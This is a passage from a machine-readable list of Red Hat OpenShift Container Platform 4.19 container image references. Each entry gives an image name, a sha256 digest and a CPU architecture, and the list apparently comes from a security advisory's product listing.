"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
